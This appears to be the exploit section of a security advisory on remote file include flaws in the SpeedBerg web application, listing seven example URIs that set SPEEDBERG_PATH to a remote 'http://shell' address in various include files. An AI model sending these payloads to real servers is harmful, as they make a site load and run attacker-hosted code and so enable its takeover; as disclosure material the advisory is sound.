• info
• discussion
• exploit
• solution
• references

SpeedBerg SPEEDBERG_PATH Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following example URIs demonstrate these vulnerabilities:

http://www.example.com/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=http://shell
http://www.example.com/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=http://shell
http://www.example.com/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=http://shell
http://www.example.com/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=http://shell
http://www.example.com/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=http://shell
http://www.example.com/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=http://shell
http://www.example.com/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=http://shell